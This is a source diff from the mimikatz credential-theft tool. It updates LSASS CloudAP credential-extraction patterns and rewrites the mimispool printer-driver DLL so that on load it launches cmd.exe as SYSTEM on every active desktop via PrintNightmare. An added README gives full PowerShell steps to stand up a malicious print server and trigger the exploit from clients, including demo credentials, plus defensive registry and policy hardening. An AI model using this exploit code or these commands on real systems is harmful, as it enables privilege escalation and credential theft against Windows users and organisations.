-BYTE PTRN_WALL_CloudApLocateLogonSession[]	= {0x44, 0x8b, 0x01, 0x44, 0x39, 0x42, 0x18, 0x75};
+BYTE PTRN_WALL_CloudApLocateLogonSession[]	= {0x44, 0x8b, 0x01, 0x44, 0x39, 0x42};//, 0x18, 0x75};
 KULL_M_PATCH_GENERIC CloudApReferences[] = {
 	{KULL_M_WIN_BUILD_10_1909,	{sizeof(PTRN_WALL_CloudApLocateLogonSession),	PTRN_WALL_CloudApLocateLogonSession},	{0, NULL}, {-9}},
 };
@ -35,7 +35,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURIT
 	KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
 	KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};

-	if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL)/*(CloudApGlobalLogonSessionList = (PKIWI_CLOUDAP_LOGON_LIST_ENTRY) ((PBYTE) kuhl_m_sekurlsa_cloudap_package.Module.Informations.DllBase.address + 0x71100))*/)
+	if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL))
 	{
 		aLsassMemory.address = CloudApGlobalLogonSessionList;
 		if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
--- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h
+++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h
@ -75,4 +75,19 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY {
 	DWORD64 unk3;
 	PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
 	// ...
-} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY;
+} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY;
+
+typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 {
+	struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Flink;
+	struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Blink;
+	DWORD unk0;
+	DWORD unk1;
+	DWORD unk2;
+	LUID	LocallyUniqueIdentifier;
+	DWORD unk3;
+	DWORD unk4;
+	DWORD unk5;
+	DWORD unk6;
+	PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
+	// ...
+} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
--- a/mimispool/README.md
+++ b/mimispool/README.md
@ -0,0 +1,166 @@
+## PowerShell commands
+
+### Server
+
+#### install
+```
+$printerName     = 'Kiwi Legit Printer'
+$system32        = $env:systemroot + '\system32'
+$drivers         = $system32 + '\spool\drivers'
+$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName
+
+Invoke-WebRequest -Uri 'https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip' -OutFile '.\mimikatz_trunk.zip'
+Expand-Archive -Path '.\mimikatz_trunk.zip' -DestinationPath '.\mimikatz_trunk'
+
+Copy-Item -Force -Path ($system32 + '\mscms.dll')             -Destination ($system32 + '\mimispool.dll')
+Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll'   -Destination ($drivers  + '\x64\3\mimispool.dll')
+Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers  + '\W32X86\3\mimispool.dll')
+
+Add-PrinterDriver -Name       'Generic / Text Only'
+Add-Printer       -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared
+
+New-Item         -Path ($RegStartPrinter + '\CopyFiles')        | Out-Null
+
+New-Item         -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Directory' -PropertyType 'String'      -Value 'x64\3'           | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Files'     -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Module'    -PropertyType 'String'      -Value 'mscms.dll'       | Out-Null
+
+New-Item         -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String'      -Value 'W32X86\3'        | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files'     -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module'    -PropertyType 'String'      -Value 'mscms.dll'       | Out-Null
+
+New-Item         -Path ($RegStartPrinter + '\CopyFiles\Mango')  | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Directory' -PropertyType 'String'      -Value $null             | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Files'     -PropertyType 'MultiString' -Value $null             | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Module'    -PropertyType 'String'      -Value 'mimispool.dll'   | Out-Null
+
+```
+
+#### uninstall
+```
+$printerName     = 'Kiwi Legit Printer'
+$system32        = $env:systemroot + '\system32'
+$drivers         = $system32 + '\spool\drivers'
+
+Remove-Printer       -Name $printerName
+Start-Sleep -Seconds 2
+Remove-PrinterDriver -Name 'Generic / Text Only'
+
+Remove-Item -Force -Path ($drivers  + '\x64\3\mimispool.dll')
+Remove-Item -Force -Path ($drivers  + '\W32X86\3\mimispool.dll')
+Remove-Item -Force -Path ($system32 + '\mimispool.dll')
+
+```
+
+### Client
+
+#### Any computer with explicit credential to `printnightmare.gentilkiwi.com`
+```
+$serverName  = 'printnightmare.gentilkiwi.com'
+$username    = 'gentilguest'
+$password    = 'password'
+$printerName = 'Kiwi Legit Printer'
+
+$fullprinterName = '\\' + $serverName + '\' + $printerName
+$credential = (New-Object System.Management.Automation.PSCredential($username, (ConvertTo-SecureString -AsPlainText -String $password -Force)))
+
+Remove-PSDrive -Force -Name 'KiwiLegitPrintServer' -ErrorAction SilentlyContinue
+Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
+
+New-PSDrive -Name 'KiwiLegitPrintServer' -Root ('\\' + $serverName + '\print$') -PSProvider FileSystem -Credential $credential | Out-Null
+Add-Printer -ConnectionName $fullprinterName
+
+$driver = (Get-Printer -Name $fullprinterName).DriverName
+Remove-Printer -Name $fullprinterName
+Remove-PrinterDriver -Name $driver
+Remove-PSDrive -Force -Name 'KiwiLegitPrintServer'
+# mimispool still in spool\drivers
+
+```
+
+#### Computer in domain (single sign on with current user to print server)
+```
+$serverName  = 'print.lab.local'
+$printerName = 'Kiwi Legit Printer'
+
+$fullprinterName = '\\' + $serverName + '\' + $printerName
+
+Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
+Add-Printer -ConnectionName $fullprinterName
+
+$driver = (Get-Printer -Name $fullprinterName).DriverName
+Remove-Printer -Name $fullprinterName
+Remove-PrinterDriver -Name $driver
+# mimispool still in spool\drivers
+
+```
+
+## Protect
+_to adapt to your environment_
+
+**Please, do not set `RestrictDriverInstallationToAdministrators` to `0` without these settings**
+
+### Registry
+
+#### `.reg` file
+```
+Windows Registry Editor Version 5.00
+
+[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint]
+"PackagePointAndPrintOnly"=dword:00000001
+"PackagePointAndPrintServerList"=dword:00000001
+
+[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers]
+"1"="/your really legit servers or invalid entry !/"
+```
+
+#### commands
+```
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v 1 /t REG_SZ /d "/your really legit servers or invalid entry !/"
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1
+```
+
+### Registry with real printer servers and allowing non-administrators to install package P&P drivers & printers
+
+#### `.reg` file
+```
+Windows Registry Editor Version 5.00
+
+[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint]
+"PackagePointAndPrintOnly"=dword:00000001
+"PackagePointAndPrintServerList"=dword:00000001
+
+[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers]
+"srv1.fqdn"="srv1.fqdn"
+"srv2.fqdn"="srv2.fqdn"
+
+[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint]
+"RestrictDriverInstallationToAdministrators"=dword:00000000
+```
+
+#### commands
+```
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v "srv1.fqdn" /t REG_SZ /d "srv1.fqdn"
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v "srv2.fqdn" /t REG_SZ /d "srv2.fqdn"
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1
+
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" /f /v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 0
+```
+
+### GPO / Local
+
+In `Computer Configuration`, `Administrative Templates`, `Printers`, enable:
+- `Only use Package Point and Print`
+- `Package Point and Print - Approved servers`
+
+![image](https://user-images.githubusercontent.com/2307945/129240741-b2a0ba14-6858-4c3f-ad07-07fa55efca29.png)
+
+### GPO with real printer servers and allowing non-administrators to install package P&P drivers & printers
+
+Same configuration as previously - _with real printer server names this time_ - but do not forget to add registry key `RestrictDriverInstallationToAdministrators` to `0`
+
+![image](https://user-images.githubusercontent.com/2307945/133833820-a66b3ffd-a3aa-43a2-a1bf-14581a2a7492.png)
--- a/mimispool/mimispool.c
+++ b/mimispool/mimispool.c
@ -5,48 +5,36 @@
 */
 #include "mimispool.h"

-BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
 {
-	BOOL ret = TRUE;
-	
-	switch( ul_reason_for_call ) 
-    { 
-        case DLL_PROCESS_ATTACH:
-			kspool(TEXT(__FUNCTION__) L"-PROCESS_ATTACH");
-			ret = FALSE; 
-			// FALSE avoid to keep library in memory (PrintNightmare < 3/4)
-			// TRUE will mimic "real" driver/config -- to use/test with /useown on local (remote is not compatible with GetFileVersionInfo*)
-            break;
+	UNREFERENCED_PARAMETER(hinstDLL);
+	UNREFERENCED_PARAMETER(lpReserved);

-        case DLL_THREAD_ATTACH:
-			kspool(TEXT(__FUNCTION__) L"-THREAD_ATTACH");
-            break;
+	if (fdwReason == DLL_PROCESS_ATTACH)
+	{
+		RunProcessForAll(L"cmd.exe");
+	}

-        case DLL_THREAD_DETACH:
-			kspool(TEXT(__FUNCTION__) L"-THREAD_DETACH");
-            break;
-
-        case DLL_PROCESS_DETACH:
-			kspool(TEXT(__FUNCTION__) L"-PROCESS_DETACH");
-            break;
-    }
-
-	return ret;
+	return TRUE;
 }

-BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
+// PrintNightMare 2.x - via config file and/or "real driver"
+VOID APIENTRY DrvResetConfigCache()
+{
+	;
+}
+
+BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
 {
 	BOOL status = FALSE;

-	kspool(TEXT(__FUNCTION__));
-
-	if ( dwMode == DRVQUERY_USERMODE)
+	if (dwMode == DRVQUERY_USERMODE)
 	{
 		*pcbNeeded = sizeof(DWORD);
 		if (pBuffer && (cbBuf >= sizeof(DWORD)))
 		{
 			status = TRUE;
-			*(DWORD *)pBuffer = TRUE;
+			*(DWORD*)pBuffer = TRUE;
 		}
 		SetLastError(ERROR_INSUFFICIENT_BUFFER);
 	}
@ -58,13 +46,11 @@ BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbB
 	return status;
 }

-BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA *pded)
+BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded)
 {
 	BOOL status = FALSE;

-	kspool(TEXT(__FUNCTION__));
-
-	if((iEngineVersion < 0x20000) || (cj < 0x10))
+	if ((iEngineVersion < 0x20000) || (cj < 0x10))
 	{
 		SetLastError(ERROR_BAD_DRIVER_LEVEL);
 	}
@ -81,50 +67,83 @@ BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA *pde

 VOID APIENTRY DrvDisableDriver()
 {
-	kspool(TEXT(__FUNCTION__));
+	;
 }

-VOID APIENTRY DrvResetConfigCache()
-{
-	kspool(TEXT(__FUNCTION__));
-}
+// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)

-void kspool(LPCWSTR szFrom)
+// PrintNightMare 4.x - via CopyFiles
+DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
 {
-	FILE * kspool_logfile;
-	WCHAR Buffer[256 + 1];
-	DWORD cbBuffer = ARRAYSIZE(Buffer);
-
-#pragma warning(push)
-#pragma warning(disable:4996)
-	if(kspool_logfile = _wfopen(L"mimispool.log", L"a"))
-#pragma warning(pop)
-	{
-		klog(kspool_logfile, L"[" PLATFORM L"] [%s] as \'%s\'\n", szFrom, GetUserName(Buffer, &cbBuffer) ? Buffer : L"-");
-		fclose(kspool_logfile);
-	}
-}
-
-void klog(FILE * logfile, PCWCHAR format, ...)
-{
-	if(logfile)
-	{
-		va_list args;
-		va_start(args, format);
-		vfwprintf(logfile, format, args);
-		va_end(args);
-		fflush(logfile);
-	}
-}
-
-DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE  pSplClientInfo, DWORD   dwLevel, LPWSTR  pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR  pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
-{
-	kspool(TEXT(__FUNCTION__));
+	UNREFERENCED_PARAMETER(pszPrinterName);
+	UNREFERENCED_PARAMETER(pszDirectory);
+	UNREFERENCED_PARAMETER(pSplClientInfo);
+	UNREFERENCED_PARAMETER(dwLevel);
+	UNREFERENCED_PARAMETER(pszSourceDir);
+	UNREFERENCED_PARAMETER(pcchSourceDirSize);
+	UNREFERENCED_PARAMETER(pszTargetDir);
+	UNREFERENCED_PARAMETER(pcchTargetDirSize);
+	UNREFERENCED_PARAMETER(dwFlags);
+	
 	return ERROR_SUCCESS;
 }

-BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD  dwCopyFileEvent)
+BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
 {
-	kspool(TEXT(__FUNCTION__));
+	UNREFERENCED_PARAMETER(pszPrinterName);
+	UNREFERENCED_PARAMETER(pszKey);
+	UNREFERENCED_PARAMETER(dwCopyFileEvent);
+	
 	return TRUE;
+}
+
+// Kiwi payload - SYSTEM on all active desktop(s)
+BOOL RunProcessForAll(LPWSTR szProcess)
+{
+	BOOL status = FALSE;
+	STARTUPINFO si = { 0 };
+	PROCESS_INFORMATION pi = { 0 };
+	HANDLE hToken, hNewToken;
+	DWORD i, count;
+	LPVOID Environment;
+	PSESSIONIDW sessions;
+
+	si.cb = sizeof(si);
+	si.lpDesktop = L"winsta0\\default";
+
+	if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
+	{
+		if (DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hNewToken))
+		{
+			if (CreateEnvironmentBlock(&Environment, hNewToken, FALSE))
+			{
+				if (WinStationEnumerateW(SERVERHANDLE_CURRENT, &sessions, &count)) // cmd as SYSTEM for everyone
+				{
+					for (i = 0; i < count; i++)
+					{
+						if (sessions[i].State == State_Active)
+						{
+							if (SetTokenInformation(hNewToken, TokenSessionId, &sessions[i].SessionId, sizeof(sessions[i].SessionId)))
+							{
+								if (CreateProcessAsUser(hNewToken, szProcess, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT, Environment, NULL, &si, &pi))
+								{
+									CloseHandle(pi.hThread);
+									CloseHandle(pi.hProcess);
+								}
+							}
+						}
+					}
+					if (sessions)
+					{
+						WinStationFreeMemory(sessions);
+					}
+				}
+				DestroyEnvironmentBlock(Environment);
+			}
+			CloseHandle(hNewToken);
+		}
+		CloseHandle(hToken);
+	}
+
+	return status;
 }
--- a/mimispool/mimispool.def
+++ b/mimispool/mimispool.def
@ -1,10 +1,11 @@
 LIBRARY
 EXPORTS
+	; PrintNightMare 2.x - via config file and/or "real driver"
+	DrvResetConfigCache
 	DrvQueryDriverInfo
 	DrvEnableDriver
 	DrvDisableDriver

-	DrvResetConfigCache
-
+	; PrintNightMare 4.x - via CopyFiles
 	GenerateCopyFilePaths
 	SpoolerCopyFileEvent
--- a/mimispool/mimispool.h
+++ b/mimispool/mimispool.h
@ -5,35 +5,75 @@
 */
 #pragma once
 #include <windows.h>
-#include <stdio.h>
+#include <userenv.h>

-#if defined(_M_X64) || defined(_M_ARM64) // to do, for real one day
-#define PLATFORM L"x64"
-#elif defined(_M_IX86)
-#define PLATFORM L"x86"
-#endif
+//__pragma(comment(linker, "/export:DllCanUnloadNow=KyXPUI_orig.DllCanUnloadNow,PRIVATE"))
+//__pragma(comment(linker, "/export:DllGetClassObject=KyXPUI_orig.DllGetClassObject,PRIVATE"))

-typedef LONG_PTR (APIENTRY *PFN)();
+#define LOGONID_CURRENT			((ULONG) -1)
+#define SERVERHANDLE_CURRENT	((HANDLE) NULL)
+#define MAX_THINWIRECACHE		4
+#define WINSTATIONNAME_LENGTH	32
+#define DOMAIN_LENGTH			17
+#define USERNAME_LENGTH			20
+typedef WCHAR WINSTATIONNAME[WINSTATIONNAME_LENGTH + 1];
+
+typedef enum _WINSTATIONSTATECLASS {
+	State_Active = 0,
+	State_Connected = 1,
+	State_ConnectQuery = 2,
+	State_Shadow = 3,
+	State_Disconnected = 4,
+	State_Idle = 5,
+	State_Listen = 6,
+	State_Reset = 7,
+	State_Down = 8,
+	State_Init = 9
+} WINSTATIONSTATECLASS;
+
+#pragma warning(push)
+#pragma warning(disable:4201)
+typedef struct _SESSIONIDW {
+	union {
+		ULONG SessionId;
+		ULONG LogonId;
+	} DUMMYUNIONNAME;
+	WINSTATIONNAME WinStationName;
+	WINSTATIONSTATECLASS State;
+} SESSIONIDW, * PSESSIONIDW;
+#pragma warning(pop)
+
+BOOLEAN WINAPI WinStationEnumerateW(IN HANDLE hServer, OUT PSESSIONIDW* SessionIds, OUT PULONG Count);
+BOOLEAN WINAPI WinStationFreeMemory(IN PVOID Buffer);
+
+typedef LONG_PTR(APIENTRY* PFN)();

 typedef struct  _DRVFN {
 	ULONG iFunc;
 	PFN pfn;
-} DRVFN, *PDRVFN;
+} DRVFN, * PDRVFN;

 typedef struct  tagDRVENABLEDATA {
 	ULONG iDriverVersion;
 	ULONG c;
-	DRVFN *pdrvfn;
-} DRVENABLEDATA, *PDRVENABLEDATA;
+	DRVFN* pdrvfn;
+} DRVENABLEDATA, * PDRVENABLEDATA;

 #define DRVQUERY_USERMODE 1

-BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD   dwMode, __out_bcount(cbBuf) PVOID   pBuffer, DWORD   cbBuf, __out_ecount(1) PDWORD  pcbNeeded);
-__control_entrypoint(DeviceDriver) BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, __in_bcount(cj) DRVENABLEDATA *pded);
-VOID APIENTRY  DrvDisableDriver();
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved);

-void kspool(LPCWSTR szFrom);
-void klog(FILE * logfile, PCWCHAR format, ...);
+// PrintNightMare 2.x - via config file and/or "real driver"
+VOID APIENTRY DrvResetConfigCache();
+BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded);
+BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded);
+VOID APIENTRY DrvDisableDriver();

-DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE  pSplClientInfo, DWORD   dwLevel, LPWSTR  pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR  pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags);
-BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD  dwCopyFileEvent);
+// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
+
+// PrintNightMare 4.x - via CopyFiles
+DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags);
+BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent);
+
+// Kiwi payload - SYSTEM on all active desktop(s)
+BOOL RunProcessForAll(LPWSTR szProcess);
--- a/mimispool/mimispool.vcxproj
+++ b/mimispool/mimispool.vcxproj
@ -79,7 +79,7 @@
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
      <AssemblyDebug>false</AssemblyDebug>
-      <AdditionalDependencies>advapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalDependencies>advapi32.lib;userenv.lib;winsta.lib;%(AdditionalDependencies)</AdditionalDependencies>
      <DataExecutionPrevention>true</DataExecutionPrevention>
      <LinkErrorReporting>NoErrorReport</LinkErrorReporting>
      <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
@ -100,5 +100,6 @@
  </ItemGroup>
  <ItemGroup>
    <None Include="mimispool.def" />
+    <None Include="README.md" />
  </ItemGroup>
 </Project>
--- a/mimispool/mimispool.vcxproj.filters
+++ b/mimispool/mimispool.vcxproj.filters
@ -11,5 +11,6 @@
  </ItemGroup>
  <ItemGroup>
    <None Include="mimispool.def" />
+    <None Include="README.md" />
  </ItemGroup>
 </Project>
--- a/modules/kull_m_ldap.c
+++ b/modules/kull_m_ldap.c
@ -5,7 +5,7 @@
 */
 #include "kull_m_ldap.h"

-BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn)
+BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn, PSEC_WINNT_AUTH_IDENTITY pIdentity)
 {
 	BOOL status = FALSE;
 	DWORD dwErr;
@ -14,7 +14,7 @@ BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR
 	{
 		if(*rootDn = kull_m_ldap_getRootDomainNamingContext(nc, *ld))
 		{
-			dwErr = ldap_bind_s(*ld, NULL, NULL, LDAP_AUTH_NEGOTIATE);
+			dwErr = ldap_bind_s(*ld, NULL, (PWCHAR) pIdentity, LDAP_AUTH_NEGOTIATE);
 			status = (dwErr == LDAP_SUCCESS);
 			if(!status)
 			{
--- a/modules/kull_m_ldap.h
+++ b/modules/kull_m_ldap.h
@ -9,5 +9,5 @@
 #include <WinBer.h>
 #include "kull_m_string.h"

-BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn);
+BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn, PSEC_WINNT_AUTH_IDENTITY pIdentity);
 PWCHAR kull_m_ldap_getRootDomainNamingContext(PCWCHAR nc, LDAP *ld);
--- a/modules/kull_m_memory.c
+++ b/modules/kull_m_memory.c
@ -230,6 +230,7 @@ BOOL kull_m_memory_alloc(IN PKULL_M_MEMORY_ADDRESS Address, IN SIZE_T Lenght, IN
 			kull_m_kernel_ioctl_handle(Address->hMemory->pHandleDriver->hDriver, IOCTL_MIMIDRV_VM_ALLOC, NULL, (DWORD) Lenght, &ptrAddress, &lenPtr, FALSE);
 			break;
 		default:
+			SetLastError(ERROR_NOT_SUPPORTED);
 			break;
 	}
 	return (Address->address) != NULL;
--- a/modules/kull_m_net.h
+++ b/modules/kull_m_net.h
@ -211,6 +211,4 @@ NET_API_STATUS NET_API_FUNCTION NetWkstaUserEnum(IN LMSTR servername, IN DWORD l
 NET_API_STATUS NET_API_FUNCTION NetShareEnum(IN LMSTR servername, IN DWORD level, OUT LPBYTE *bufptr, IN DWORD prefmaxlen, OUT LPDWORD entriesread, OUT LPDWORD totalentries, IN OUT LPDWORD resume_handle);
 NET_API_STATUS NET_API_FUNCTION NetStatisticsGet(IN LPWSTR server, IN LPWSTR service, IN DWORD  level, IN DWORD  options, OUT LPBYTE *bufptr);
 NET_API_STATUS NET_API_FUNCTION NetRemoteTOD(IN LPCWSTR UncServerName, OUT PTIME_OF_DAY_INFO *pToD);
-NET_API_STATUS NET_API_FUNCTION NetServerGetInfo(IN LPWSTR servername, IN DWORD level, OUT LPBYTE *bufptr);
-NET_API_STATUS NET_API_FUNCTION NetShareAdd(IN LMSTR servername, IN DWORD level, IN LPBYTE buf, OUT LPDWORD parm_err);
-NET_API_STATUS NET_API_FUNCTION NetConnectionEnum(IN LMSTR servername, LMSTR qualifier, DWORD level, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, LPDWORD resume_handle);
+NET_API_STATUS NET_API_FUNCTION NetServerGetInfo(IN LPWSTR servername, IN DWORD level, OUT LPBYTE *bufptr);
--- a/modules/rpc/kull_m_rpc.h
+++ b/modules/rpc/kull_m_rpc.h
@ -22,6 +22,8 @@
 #include "../kull_m_crypto.h"
 #include "../kull_m_process.h"

+#define NDR_TSI_20 { {0x8a885d04, 0x1ceb, 0x11c9, { 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 }}, { 2, 0 }}
+
 typedef DWORD NET_API_STATUS;
 typedef UNICODE_STRING RPC_UNICODE_STRING;

--- a/modules/rpc/kull_m_rpc_drsr.c
+++ b/modules/rpc/kull_m_rpc_drsr.c
@ -550,7 +550,9 @@ BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, A
 			{
 				oidPrefix.length -= (lastValue < 0x80) ? 1 : 2;
 				if(status = kull_m_rpc_drsr_MakeAttid_addPrefixToTable(prefixTable, &oidPrefix, &ndx, toAdd))
+				{
 					*att |= ndx << 16;
+				}
 				else PRINT_ERROR(L"kull_m_rpc_drsr_MakeAttid_addPrefixToTable\n");
 				kull_m_asn1_freeEnc(oidPrefix.value);
 			}
@ -559,23 +561,32 @@ BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, A
 	return status;
 }

-ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid)
+ATTRVALBLOCK * kull_m_rpc_drsr_findAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type)
 {
